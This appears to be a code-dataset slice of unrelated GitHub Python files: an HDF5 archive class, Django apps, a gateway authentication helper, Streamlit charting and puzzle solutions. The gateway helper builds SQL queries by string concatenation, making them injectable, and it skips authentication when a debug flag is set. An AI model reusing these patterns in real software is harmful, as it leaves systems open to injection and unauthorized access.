write_header(h5file.attrs)\n\n    # File properties\n\n    @property\n    def name(self):\n        \"\"\" File name on disk. \"\"\"\n        return self._filename\n\n    @property\n    def mode(self):\n        \"\"\" Mode used to open file. \"\"\"\n        return self._mode\n\n    # Format attrs\n\n    @property\n    def FileFormat(self):\n        \"\"\" The 'FileFormat' file attribute. \"\"\"\n        return self._get_attr('FileFormat')\n\n    @property\n    def FormatVersion(self):\n        \"\"\" The format version from the SDA file. \"\"\"\n        return self._get_attr('FormatVersion')\n\n    @property\n    def Writable(self):\n        \"\"\" The 'Writable' flag from the SDA file. \"\"\"\n        return self._get_attr('Writable')\n\n    @Writable.setter\n    def Writable(self, value):\n        if self._mode not in WRITE_MODES:\n            raise ValueError(\"File is not writable.\")\n        if not is_valid_writable(value):\n            raise ValueError(\"Must be 'yes' or 'no'\")\n        with self._h5file('r+') as h5file:\n            set_encoded(h5file.attrs, Writable=value)\n\n    @property\n    def Created(self):\n        \"\"\" The time the file was created. \"\"\"\n        return self._get_attr('Created')\n\n    @property\n    def Updated(self):\n        \"\"\" The time the file was last updated. 
\"\"\"\n return self._get_attr('Updated')\n\n # Public\n def describe(self, label, description=''):\n \"\"\" Change the description of a data entry.\n\n Parameters\n ----------\n label : str\n The data label.\n description : str\n A description to accompany the data\n\n Raises\n ------\n ValueError if the label contains invalid characters\n ValueError if the label does not exist\n\n \"\"\"\n self._validate_can_write()\n self._validate_labels(label, must_exist=True)\n with self._h5file('r+') as h5file:\n set_encoded(h5file[label].attrs, Description=description)\n update_header(h5file.attrs)\n\n def extract(self, label):\n \"\"\" Extract data from an SDA file.\n\n Parameters\n ----------\n label : str\n The data label.\n\n Returns\n -------\n data : object\n Archive data associated with the label.\n\n Notes\n -----\n Sparse numeric data is extracted as\n :class:`coo_matrix`. This format does\n not support all numpy operations.\n\n Raises\n ------\n ValueError if the label contains invalid characters\n ValueError if the label does not exist\n\n \"\"\"\n self._validate_labels(label, must_exist=True)\n with self._h5file('r') as h5file:\n return extract(h5file, label)\n\n def extract_to_file(self, label, path, overwrite=False):\n \"\"\" Extract a file record to file.\n\n Parameters\n ----------\n label : str\n Label of the file record.\n path : str\n The path to which the file is to be written.\n overwrite : bool, optional\n Unless specified as True, an existing file with the chosen name\n will not be overwritten by this method.\n\n Raises\n ------\n IOError if `overwrite` is False and the destintation file exists.\n\n \"\"\"\n\n if op.exists(path) and not overwrite:\n raise IOError(\"File '{}' exists. Will not overwrite.\".format(path))\n self._validate_labels(label, must_exist=True)\n\n # Check that archive is a file archive\n record_type = self._get_attr('RecordType', root=label)\n if record_type != 'file':\n raise ValueError(\"'{}' is not a file record\".format(label))\n\n with open(path, 'wb') as f:\n f.write(self.extract(label))\n\n def insert(self, label, data, description='', deflate=0,\n as_structures=False):\n \"\"\" Insert data into an SDA file.\n\n Parameters\n ----------\n label : str\n The data label.\n data :\n The data to insert. See the notes below.\n description : str, optional\n A description to accompany the data\n deflate : int, optional\n An integer value from 0 to 9, specifying the compression level to\n be applied to the stored data.\n as_record : bool, optional\n If specified, data that is storable as a cell record and has\n homogenous cells will be stored as a \"structures\" record. Note that\n this does not extend to nested cell records.\n\n Raises\n ------\n ValueError if the data is of an unsupported type\n ValueError if the label contains invalid characters\n ValueError if the label exists\n ValueError if `as_structures` is True and the data cannot be stored as\n a structures record.\n\n Notes\n -----\n This stores specific data types as described here.\n\n sequences :\n Lists, tuples, and anything else that identifies as a\n collections.abc.Sequence are stored as 'cell' records, no matter\n the contents.\n\n dicts :\n Dictionaries are stored as 'structure' records.\n\n numpy arrays :\n If the dtype is a supported numeric type, then a numpy array is\n stored as a 'numeric' record. Arrays of 'bool' type are stored as\n 'logical' records. Arrays of characters (dtype 'S1') are stored as\n 'character' records. 
Object and string arrays are stored as 'cell'\n records.\n\n sparse arrays (:class:`coo_matrix`) :\n These are stored as 'numeric' records if the dtype is a type\n supported for numeric numpy arrays.\n\n strings :\n Strings are stored as 'character' records. An attempt will be\n made to convert the input to ascii encoded bytes, no matter the\n underlying encoding. This may result in an encoding exception if\n the input cannot be ascii encoded.\n\n non-string scalars :\n Non-string scalars are stored as 'numeric' if numeric, or 'logical'\n if boolean.\n\n file-like :\n The contents of a file-like objects (with a 'read' method) are\n stored as 'file' records.\n\n other :\n Arrays of characters are not supported. Convert to a string.\n Object arrays are not supported. Cast to another dtype or turn into\n a list.\n\n Anything not listed above is not (intentionally) supported.\n\n See Also\n --------\n insert_from_file : Insert contents of a named file.\n\n \"\"\"\n self._validate_can_write()\n self._validate_labels(label, can_exist=False)\n if not isinstance(deflate, (int, np.integer)) or not 0 <= deflate <= 9:\n msg = \"'deflate' must be an integer from 0 to 9\"\n raise ValueError(msg)\n cls = self._registry.get_inserter(data)\n if cls is None:\n msg = \"{!r} is not a supported type\".format(data)\n raise ValueError(msg)\n\n inserter = cls(label, data, deflate, self._registry)\n\n if as_structures:\n if inserter.record_type != 'cell':\n msg = \"Data cannot be stored as a 'structures' record.\"\n raise ValueError(msg)\n\n validate_structures(data, self._registry)\n\n # Tell the inserter to use the 'structures' record type\n inserter.record_type = 'structures'\n\n with self._h5file('r+') as h5file:\n try:\n inserter.insert(h5file, description)\n except Exception:\n # Do not leave things in an invalid state\n if label in h5file:\n del h5file[label]\n raise\n else:\n update_header(h5file.attrs)\n\n def insert_from_file(self, path, description='', deflate=0):\n \"\"\" Insert the contents of a file as a file record.\n\n Parameters\n ----------\n path : str\n The path to the file. 
The basename of the path will be used as the\n record label.\n description : str, optional\n A description to accompany the data\n deflate : int, optional\n An integer value from 0 to 9, specifying the compression level to\n be applied to the stored data.\n\n Returns\n -------\n label : str\n The label under which the file was stored.\n\n See Also\n --------\n insert : Insert data into the archive\n\n \"\"\"\n if not op.isfile(path):\n raise ValueError(\"File '{}' does not exist\".format(path))\n\n label = op.basename(path)\n with open(path, 'rb') as f:\n self.insert(label, f, description, deflate)\n return label\n\n def labels(self):\n \"\"\" Get data labels from the archive.\n\n Returns\n -------\n labels : list of str\n Labels from the archive.\n\n \"\"\"\n with self._h5file('r') as h5file:\n return list(h5file.keys())\n\n def remove(self, *labels):\n \"\"\" Remove specified records from the archive.\n\n This cannot be undone.\n\n \"\"\"\n self._validate_can_write()\n self._validate_labels(labels, must_exist=True)\n\n # Create a new file so space is actually freed\n def _copy_visitor(path, source, destination, labels):\n \"\"\" Visitor that copies data from source to destination \"\"\"\n\n # Skip paths corresponding to excluded labels\n if path.split('/')[0] in labels:\n return\n\n # Copy everything else\n source_obj = source[path]\n if isinstance(source_obj, h5py.Group):\n dest_obj = destination.create_group(path)\n else:\n ds = source_obj\n dest_obj = destination.create_dataset(\n path,\n data=source_obj[()],\n chunks=ds.chunks,\n maxshape=ds.maxshape,\n compression=ds.compression,\n compression_opts=ds.compression_opts,\n scaleoffset=ds.scaleoffset,\n shuffle=ds.shuffle,\n fletcher32=ds.fletcher32,\n fillvalue=ds.fillvalue,\n )\n\n dest_obj.attrs.update(source_obj.attrs)\n\n pid, destination_path = tempfile.mkstemp()\n os.close(pid)\n with h5py.File(destination_path, 'w') as destination:\n with self._h5file('r') as source:\n destination.attrs.update(source.attrs)\n source.visit(\n partial(\n _copy_visitor,\n source=source,\n destination=destination,\n labels=set(labels),\n\n )\n )\n update_header(destination.attrs)\n shutil.move(destination_path, self._filename)\n\n def probe(self, pattern=None):\n \"\"\" Summarize the state of the archive\n\n This requires the pandas package.\n\n Parameters\n ----------\n pattern : str or None, optional\n A search pattern (python regular expression) applied to find\n archive labels of interest. 
If None, all labels are selected.\n\n Returns\n -------\n summary : :class:`DataFrame`\n A table summarizing the archive.\n\n \"\"\"\n from pandas import DataFrame\n labels = self.labels()\n if pattern is not None:\n regex = re.compile(pattern)\n labels = [\n label for label in labels if regex.match(label) is not None\n ]\n\n summary = []\n with self._h5file('r') as h5file:\n for label in labels:\n g = h5file[label]\n attrs = get_decoded(g.attrs)\n if label in g:\n attrs.update(get_decoded(g[label].attrs))\n attrs['label'] = label\n summary.append(attrs)\n\n cols = [\n 'label', 'RecordType', 'Description', 'Empty', 'Deflate',\n 'Complex', 'ArraySize', 'Sparse', 'RecordSize', 'Class',\n 'FieldNames', 'Command',\n ]\n return DataFrame(summary, columns=cols).set_index('label').fillna('')\n\n def replace(self, label, data):\n \"\"\" Replace an existing dataset.\n\n Parameters\n ----------\n label : str\n The record label.\n data :\n The data with which to replace the record.\n\n Notes\n -----\n This is equivalent to removing the data and inserting a new entry using\n the same ``label``, ``description``, and ``deflate`` options.\n\n \"\"\"\n self._validate_can_write()\n self._validate_labels(label, must_exist=True)\n with self._h5file('r+') as h5file:\n attrs = get_decoded(h5file[label].attrs, 'Deflate', 'Description')\n del h5file[label]\n self.insert(label, data, attrs['Description'], attrs['Deflate'])\n\n def update_object(self, label, data):\n \"\"\" Update an existing object record.\n\n Parameters\n ----------\n label : str\n Label of the object record.\n data : dict\n The data with which to replace the object record.\n\n Notes\n -----\n This is more strict than **replace** in that the intention is to update\n the contents of an 'object' record while preserving the record type.\n The simplest way to make use of this is to *extract* an object record,\n replace some data, and then call this to update the stored record.\n\n \"\"\"\n self._validate_can_write()\n self._validate_labels(label, must_exist=True)\n\n cls = self._registry.get_inserter(data)\n if cls is None:\n msg = \"{!r} is not a supported type\".format(data)\n raise ValueError(msg)\n\n record_type = cls.record_type\n if record_type != 'structure':\n raise ValueError(\"Input data is not a dictionary\")\n\n with self._h5file('r+') as h5file:\n # Check the general structure of the data and file\n grp = h5file[label]\n attrs = get_decoded(grp.attrs)\n if not attrs['RecordType'] == 'object':\n raise ValueError(\"Record '{}' is not an object\".format(label))\n if attrs['Empty'] == 'yes':\n raise ValueError(\"Cannot update an empty record\")\n record_sig = unnest_record(grp)\n data_sig = unnest(data, self._registry)\n if not are_signatures_equivalent(record_sig, data_sig):\n msg = \"Data is not compatible with record '{}'\"\n raise ValueError(msg.format(label))\n\n del h5file[label]\n\n self.insert(label, data, attrs['Description'], int(attrs['Deflate']))\n\n # Fix the record type and update the header\n with self._h5file('r+') as h5file:\n grp = h5file[label]\n set_encoded(\n grp.attrs,\n RecordType='object',\n Class=attrs['Class'],\n )\n update_header(h5file.attrs)\n\n def update_objects(self, label, data):\n \"\"\" Update an existing objects record.\n\n Parameters\n ----------\n label : str\n Label of the objects record.\n data : list\n The data with which to replace the objects record.\n\n Notes\n -----\n This is more strict than **replace** in that the intention is to update\n the contents of an 'objects' record while preserving the 
record type.\n The simplest way to make use of this is to *extract* an objects record,\n replace some data, and then call this to update the stored record.\n\n \"\"\"\n self._validate_can_write()\n self._validate_labels(label, must_exist=True)\n\n cls = self._registry.get_inserter(data)\n if cls is None:\n msg = \"{!r} is not a supported type\".format(data)\n raise ValueError(msg)\n\n record_type = cls.record_type\n if record_type != 'cell':\n raise ValueError(\"Input data is not a list\")\n\n # To be an 'objects' record, this must look like a 'structures' record.\n data_sig = validate_structures(data, self._registry)\n\n with self._h5file('r+') as h5file:\n # Check the general structure of the data and file\n grp = h5file[label]\n attrs = get_decoded(grp.attrs)\n if not attrs['RecordType'] == 'objects':\n raise ValueError(\"Record '{}' is not an objects\".format(label))\n if attrs['Empty'] == 'yes':\n raise ValueError(\"Cannot update an empty record\")\n record_sig = unnest_record(grp['element 1'])\n if not are_signatures_equivalent(record_sig, data_sig):\n msg = \"Data is not compatible with record '{}'\"\n raise ValueError(msg.format(label))\n\n del h5file[label]\n\n self.insert(label, data, attrs['Description'], int(attrs['Deflate']))\n\n # Fix the record type and update the header\n with self._h5file('r+') as h5file:\n grp = h5file[label]\n set_encoded(\n grp.attrs,\n RecordType='objects',\n Class=attrs['Class'],\n )\n update_header(h5file.attrs)\n\n # Private\n\n @contextmanager\n def _h5file(self, mode):\n h5file = h5py.File(self._filename, mode, **self._kw)\n try:\n yield h5file\n finally:\n h5file.close()\n\n def _get_attr(self, attr, root=None):\n \"\"\" Get a named atribute as a string \"\"\"\n with self._h5file('r') as h5file:\n if root is None:\n obj = h5file\n else:\n obj = h5file[root]\n return get_decoded(obj.attrs, attr)[attr]\n\n def _validate_can_write(self):\n \"\"\" Validate file mode and 'Writable' attr allow writing. \"\"\"\n if self._mode not in WRITE_MODES:\n raise IOError(\"File is not writable\")\n if self.Writable == 'no':\n raise IOError(\"'Writable' flag is 'no'\")\n\n def _validate_labels(self, labels, can_exist=True, must_exist=False):\n if isinstance(labels, str):\n labels = [labels]\n if len(labels) == 0:\n raise ValueError(\"Must specify labels\")\n for label in labels:\n if '/' in label or '\\\\' in label:\n msg = r\"label cannot contain '/' or '\\'\"\n raise ValueError(msg)\n with self._h5file('r') as h5file:\n for label in labels:\n label_exists = label in h5file\n if not can_exist and label_exists:\n msg = \"Label '{}' already exists.\".format(label)\n raise ValueError(msg)\n if must_exist and not label_exists:\n msg = \"Label item '{}' does not exist\".format(label)\n raise ValueError(msg)\n","repo_name":"SMASHtoolbox/SDAlibrary","sub_path":"python/sdafile/sda_file.py","file_name":"sda_file.py","file_ext":"py","file_size_in_byte":21782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"9153950470","text":"from django.urls import path\r\n\r\nfrom . 
import views\r\n\r\napp_name=\"history\"\r\n\r\nurlpatterns = [\r\n path('', views.index, name='index'),\r\n path('/', views.details, name='details'),\r\n path('newArtist', views.newArtist, name='newArtist'),\r\n path('newSong', views.newSong, name='newSong'),\r\n path('deleteSong', views.deleteSong, name='deleteSong')\r\n\r\n]","repo_name":"jasehackman/12_Music_History","sub_path":"quick/history/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"723132699","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse,HttpResponseRedirect\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom .forms import *\n\n# Create your views here.\ndef registration(request):\n if request.method == 'POST':\n form = RegisterForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('/login')\n else:\n form = RegisterForm()\n return render(request, 'registration/sign-up.html', {\"form\": form})\n\n@login_required(login_url='/login')\ndef index(request):\n title = 'instagram-app'\n posts = Image.get_images()\n comments = Comment.get_all_comments()\n users = User.objects.all()\n current_user = request.user\n if request.method == 'POST':\n form = CommentForm(request.POST)\n image_id = request.POST['image_id']\n if form.is_valid():\n comment = form.save(commit=False)\n comment.author = current_user\n image = Image.get_image(image_id)\n comment.image = image\n comment.save()\n return redirect(f'/#{image_id}', )\n else:\n form = CommentForm(auto_id=False)\n\n param = {\n \"title\": title,\n \"posts\": posts,\n \"form\": form,\n \"comments\": comments,\n \"users\": users\n }\n return render(request, 'index.html', param)\n\n@login_required(login_url='/login')\ndef profile(request):\n pictures = Image.get_images()\n if request.method == 'POST':\n user_form = EditProfileForm(request.POST, instance=request.user)\n profile_form = ProfileUpdateForm(request.POST,request.FILES,instance=request.user.profile)\n if user_form.is_valid() and profile_form.is_valid():\n user_form.save()\n profile_form.save()\n messages.success(request, f'You have successfully updated your profile!')\n return HttpResponseRedirect(request.path_info)\n else:\n user_form = EditProfileForm(instance=request.user)\n profile_form = ProfileUpdateForm(request.POST,request.FILES,instance=request.user.profile)\n return render(request, 'profile.html', {\"user_form\": user_form, \"profile_form\": profile_form, \"pictures\": pictures})\n \n return render(request, 'profile.html', {\"pictures\": pictures})\n \n@login_required(login_url='/login')\ndef post_picture(request):\n current_user = request.user\n if request.method == 'POST':\n form = PostPictureForm(request.POST, request.FILES)\n if form.is_valid():\n image = form.save(commit=False)\n image.author = current_user\n image.save()\n return redirect('/')\n else:\n form = PostPictureForm(auto_id=False)\n return render(request, 'new_picture.html', {\"form\": form})\n \ndef search_by_username(request):\n if 'author' in request.GET and request.GET['author']:\n search_term = request.GET['author']\n searched_images = Image.get_author(search_term)\n message = f'{search_term}'\n user = User.objects.all()\n param = {\n \"user\": user,\n \"images\": searched_images,\n \"message\": message\n }\n return render(request, 'search.html', param)\n else:\n 
message = \"search for a user\"\n        param = {\n            \"message\": message\n        }\n        return render(request, 'search.html', param)\n\n\n","repo_name":"Codex-Mayrie/Instagram-application","sub_path":"instagram/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
+{"seq_id":"11866931136","text":"import config\nimport hashlib\nimport time\n\n\ndef authenticate(uid, ip, x_auth_token):\n    if config.debugging:\n        print(\"WARNING: DEBUGGING MODE IS ON!\")\n        return True\n    connection = config.database.cursor(dictionary=True)\n    connection.execute(\"SELECT * FROM \"+config.gatewaytable+\" WHERE uid = \"+str(uid)+\";\")\n    results = connection.fetchall()\n    if len(results) < 1:\n        print(\"No Matching UID\")\n        return False\n    for result in results:\n        # Try to match source IP\n        if result['ip'] == ip:\n            print(\"IP Match\")\n            # Try to match x-auth-token hashed with unix time (for the last 10 seconds)\n            unixtime = int(time.time())\n            for i in range(unixtime-config.token_timeout, unixtime+config.token_timeout):\n                print(\"Trying: \"+str(hashlib.sha512(result['x-auth-base']+str(i)).hexdigest()).upper()+\" vs \"+str(x_auth_token))\n                if str(hashlib.sha512(result['x-auth-base']+str(i)).hexdigest()).upper() == str(x_auth_token):\n                    print(\"MATCH FOUND!\")\n                    return True\n    print(\"Not authorized\")\n    return False\n\n\ndef psk_lookup(uid, psk):\n    connection = config.database.cursor(dictionary=True)\n    connection.execute(\"SELECT * FROM \"+config.devicetable+\" WHERE token = '\"+str(psk)+\"' AND uid = \"+str(uid)+\";\")\n    return connection.fetchall()\n\n\ndef dev_lookup(uid, id):\n    connection = config.database.cursor(dictionary=True)\n    connection.execute(\"SELECT * FROM \"+config.devicetable+\" WHERE id = \" + str(id) + \" AND uid = \" + str(uid) + \";\")\n    return connection.fetchall()\n\n\ndef update_mac(id, mac):\n    connection = config.database.cursor(dictionary=True)\n    connection.execute(\"UPDATE \"+config.devicetable+\" SET macadd = '\"+mac+\"' WHERE id = \"+str(id)+\";\")\n    config.database.commit()\n    return True\n","repo_name":"noahburrell/gatewayapi","sub_path":"common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
+{"seq_id":"18496651382","text":"import pandas as pd\nimport streamlit as st\nimport seaborn as sns\nimport altair as alt\nimport matplotlib.pyplot as plt\nfrom math import pi\nst.title(\n    \"Clustering Analysis\"\n\n)\n# st.image('images/c.png')\n\n# mall_data = pd.read_csv('data/Mall_Customers.csv')\n# mall_data.rename({'Annual Income (k$)':'Income', \\\n#     'Spending Score (1-100)':'Spend_score'}, axis=1, \\\n#     inplace=True)\n#\n# st.write(mall_data.head())\n#\n#\n#\n# a = alt.Chart(mall_data).mark_bar().encode(\n#     alt.X(\"Income\", bin=True),\n#     y='count()'\n# )\n\n# st.altair_chart(a, use_container_width=True)\n\n\n\n\n\n\n# we can divide the groups into 3 categories by using age\n\n# a hypothesis is a theory or explanation based on evidence that is not yet proven to be true\n\n\n\n\n\n# Set data\ndf = pd.DataFrame({\n 'group': ['A','B','C','D'],\n 'var1': [38, 1.5, 30, 4],\n 'var2': [29, 10, 9, 34],\n 'var3': [8, 39, 23, 24],\n 'var4': [7, 31, 33, 14],\n 'var5': [28, 15, 32, 14]\n})\n\n# number of variable\ncategories=list(df)[1:]\nN = len(categories)\n\n# We are going to plot the first line of the data frame.\n# But we need to repeat the first value to close the circular graph:\nvalues=df.loc[0].drop('group').values.flatten().tolist()\nvalues += values[:1]\nvalues\n\n# What will be the angle of each axis in the plot? (we divide the plot / number of variable)\nangles = [n / float(N) * 2 * pi for n in range(N)]\nangles += angles[:1]\n\n# Initialise the spider plot\nax = plt.subplot(111, polar=True)\n\n# Draw one axe per variable + add labels\nplt.xticks(angles[:-1], categories, color='grey', size=8)\n\n# Draw ylabels\nax.set_rlabel_position(0)\nplt.yticks([10,20,30], [\"10\",\"20\",\"30\"], color=\"grey\", size=7)\nplt.ylim(0,40)\n\n# Plot data\nac = ax.plot(angles, values, linewidth=1, linestyle='solid')\n\n# Fill area\nax.fill(angles, values, 'b', alpha=0.1)\n\n# Show the graph (st.pyplot needs a figure; plt.show() returns None)\nst.pyplot(plt.gcf())","repo_name":"jluna1398/marketing","sub_path":"pages/page_2.py","file_name":"page_2.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
+{"seq_id":"72322887869","text":"#CCIE/CCSI:Yasser Ramzy Auda\r\n#https://www.facebook.com/yasser.auda\r\n#https://www.linkedin.com/in/yasserauda/\r\n#https://github.com/YasserAuda/PythonForNetowrk-Cisco\r\n\r\n#\tPython Program to Map Two Lists into a Dictionary \r\nkeys=[]\r\nvalues=[]\r\nn=int(input(\"Enter number of elements for dictionary:\"))\r\nprint(\"For keys:\")\r\nfor x in range(0,n):\r\n    element=int(input(\"Enter element\" + str(x+1) + \":\"))\r\n    keys.append(element)\r\nprint(\"For values:\")\r\nfor x in range(0,n):\r\n    element=int(input(\"Enter element\" + str(x+1) + \":\"))\r\n    values.append(element)\r\nd=dict(zip(keys,values))\r\nprint(\"The dictionary is:\")\r\nprint(d)\r\n\r\n#Enter number of elements for dictionary:4\r\n#For keys:\r\n#Enter element1:1\r\n#Enter element2:2\r\n#Enter element3:3\r\n#Enter element4:4\r\n#For values:\r\n#Enter element1:5\r\n#Enter element2:6\r\n#Enter element3:7\r\n#Enter element4:8\r\n#The dictionary is:\r\n#{1: 5, 2: 6, 3: 7, 4: 8}\r\n","repo_name":"YasserAuda/PythonForNetowrk-Cisco","sub_path":"8 Loops dic2.py","file_name":"8 Loops dic2.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"6"}
+{"seq_id":"8103575338","text":"#\n# @lc app=leetcode id=21 lang=python3\n#\n# [21] Merge Two Sorted Lists\n#\n\n# @lc code=start\n# Definition for singly-linked list.\n# class ListNode:\n#     def __init__(self, val=0, next=None):\n#         self.val = val\n#         self.next = next\nclass Solution:\n    def mergeTwoLists(self, list1: Optional[ListNode], list2: Optional[ListNode]) -> Optional[ListNode]:\n        \n        if not list1: return list2\n        if not list2: return list1\n\n        lil, big = (list1, list2) if list1.val < list2.val else (list2, list1)\n        lil.next = self.mergeTwoLists(lil.next, big)\n        \n        return lil\n\n\n    '''\n    res = NewList = ListNode()\n    while list1 and list2:\n        if list1.val < list2.val:\n            NewList.next = list1\n            list1 = list1.next\n        else:\n            NewList.next = list2\n            list2 = list2.next\n        NewList = NewList.next\n    if list1:\n            
NewList.next = list1\n elif list2:\n NewList.next = list2\n return res.next \n '''\n\n \n\n# @lc code=end\n\n","repo_name":"HongyuZhu999/LeetCode","sub_path":"21.merge-two-sorted-lists.py","file_name":"21.merge-two-sorted-lists.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} {"seq_id":"13461646462","text":"\"\"\"\nThe set [1,2,3,…,n] contains a total of n! unique permutations.\n\nBy listing and labeling all of the permutations in order,\nWe get the following sequence (ie, for n = 3):\n\n \"123\"\n \"132\"\n \"213\"\n \"231\"\n \"312\"\n \"321\"\n\nGiven n and k, return the kth permutation sequence.\n\nNote: Given n will be between 1 and 9 inclusive.\n\"\"\"\n\nclass Solution(object):\n def getPermutation(self, n, k):\n \"\"\"\n :type n: int\n :type k: int\n :rtype: str\n \"\"\"\n facts = [1]\n for i in range(1, n):\n facts.append(i * facts[-1])\n # def getPermutationRecur(unused, i):\n # l = len(unused)\n # if l == 0:\n # return \"\"\n # first_digit = i // facts[l - 1]\n # return unused[first_digit] + getPermutationRecur(unused[:first_digit] + unused[first_digit + 1:], i % facts[l - 1])\n # return getPermutationRecur([str(v + 1) for v in range(n)], k - 1)\n ans = \"\"\n unused = [str(v + 1) for v in range(n)]\n i = k - 1\n while n > 0:\n n -= 1\n ans += unused[i // facts[n]]\n unused.remove(ans[-1])\n i %= facts[n]\n return ans\n\nans = Solution()\nfor i in range(1, 7):\n print(ans.getPermutation(3, i))\n\nfor i in range(1, 25):\n print(ans.getPermutation(9, i))\n","repo_name":"szhongren/leetcode","sub_path":"60/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} {"seq_id":"43333679507","text":"import regex\n\n\ndef parse_rules(path):\n rules = {}\n inputs = []\n with open(path) as fp:\n lines = fp.readlines()\n for line in lines:\n line = line.strip()\n if ':' in line:\n key, val = line.strip().split(': ')\n if val.startswith('\"'):\n val = val.strip('\"')\n rules[int(key)] = val\n else:\n inputs.append(line)\n\n return rules, inputs\n\n\ndef is_resolved(key, rule, resolved):\n for segment in rule.split():\n if segment == '|' or segment == 'a' or segment == 'b':\n continue\n if int(segment) in resolved:\n continue\n\n return False\n return True\n\n\ndef resolve_rules(rules):\n unresolved = dict(rules)\n resolved = {}\n while unresolved:\n new_resolved = []\n for key, val in unresolved.items():\n if is_resolved(key, val, resolved):\n resolved[key] = val\n new_resolved.append(key)\n\n for key in new_resolved:\n del unresolved[key]\n\n return resolved\n\n\ndef expand_rule(resolved, idx, modified=False):\n rule = resolved[idx]\n if len(rule) == 1:\n return rule\n result = ''\n if modified:\n if idx == 8:\n return f'({expand_rule(resolved, 42, modified)}+)'\n if idx == 11:\n res = f'({expand_rule(resolved, 42, modified)}(?R)?{expand_rule(resolved, 31, modified)})'\n return res\n\n sectional = False\n for segment in rule.split():\n if segment == '|':\n result += '|'\n sectional = True\n else:\n try:\n result += (expand_rule(resolved, int(segment), modified))\n except Exception as ex:\n print(idx, ':', rule, modified)\n raise ex\n\n if sectional:\n return f'({result})'\n return result\n\n\ndef count_matches(lines, resolved, modified=False):\n pattern = regex.compile(expand_rule(resolved, 0, modified))\n total = 0\n for line in lines:\n m = pattern.match(line)\n if m:\n start, end = m.span()\n print(start, end, len(line))\n if len(line) == (end - start):\n total += 1\n return total\n\n\ndef check_string(original_text, resolved, modified=False):\n sections = resolved[0].split(' | ')\n for section in sections:\n text = original_text\n subrules = section.split()\n found = True\n for sr in subrules:\n p = regex.compile(f'^{expand_rule(resolved, int(sr), modified)}')\n print(p)\n m = p.match(text)\n if m is not None:\n text = text[m.end():]\n else:\n found = False\n break\n if found and not text:\n return True\n return False\n\n\ndef resolve_enumerate(idx, rules, resolved=dict()):\n rule = rules[idx]\n if len(rule) == 1:\n resolved[idx] = [rule]\n\n if idx in resolved:\n return resolved[idx]\n\n full_results = []\n for section in rule.split(' | '):\n results = ['']\n for sr in section.split():\n temp = resolve_enumerate(int(sr), rules, resolved)\n temp_results = []\n for r in results:\n for t in temp:\n temp_results.append(f'{r}{t}')\n results = temp_results\n full_results += results\n\n resolved[idx] = full_results\n return full_results\n\n\ndef match_8(line, eight):\n for option in eight:\n if line.startswith(option):\n return True\n return False\n\n\ndef match_11(line, eleven):\n for option in eleven:\n h1, h2 = option[:len(option)//2], option[len(option)//2:]\n if line.startswith(h1) and line.endswith(h2):\n return True\n return False\n\n\ndef check_11(line, eleven):\n len11 = len(eleven[0])\n if not line or len(line) % len11 != 0:\n return False\n while line:\n if match_11(line, eleven):\n line = line[len11//2:-len11//2]\n else:\n return False\n return True\n\n\ndef parse_modified(line, eight, eleven):\n len8 = len(eight[0])\n len11 = len(eleven[0])\n\n if match_8(line, eight):\n line = line[len8:]\n else:\n return False\n\n while True:\n if check_11(line, eleven):\n return True\n\n if match_8(line, eight):\n line = line[len8:]\n else:\n return False\n\n return False\n\n\nif __name__ == '__main__':\n rules, inputs = parse_rules('data/d19_input1_large.txt')\n resolved = set(resolve_enumerate(0, rules))\n print(sum(1 for line in inputs if line in resolved))\n\n eight = resolve_enumerate(8, rules)\n eleven = resolve_enumerate(11, rules)\n print(sum(1 for line in inputs if parse_modified(line, eight, eleven)))\n","repo_name":"hiranya911/coding-challenges","sub_path":"AdventOfCode2020/d19.py","file_name":"d19.py","file_ext":"py","file_size_in_byte":4829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} {"seq_id":"19535532076","text":"import logging\n\n#Common functions for customized objects\ndef show(object_instance):\n if hasattr(object_instance, 'objname') == False:\n print('ERROR: Show function should be used only for customized classes!!!')\n return None\n if isinstance(object_instance, NamedList): # For NAMED LISTS\n for index, item in enumerate(object_instance):\n show(item)\n for attr, value in object_instance.__dict__.items():\n # print(type(value))\n if isinstance(value, NamedList): # For NAMED LISTS\n for item in value:\n show(item)\n else:\n print(attr, value)\n\n\ndef grep(object_instance, keyword):\n # Function to find attributes and values in objects by keyword\n if hasattr(object_instance, 'objname') == False:\n print('ERROR: GREP function should be used only for customized classes!!!')\n return None\n if isinstance(object_instance, NamedList): # For NAMED LISTS\n for index, item in enumerate(object_instance):\n grep(item, keyword)\n for attr, value in object_instance.__dict__.items():\n if isinstance(value,
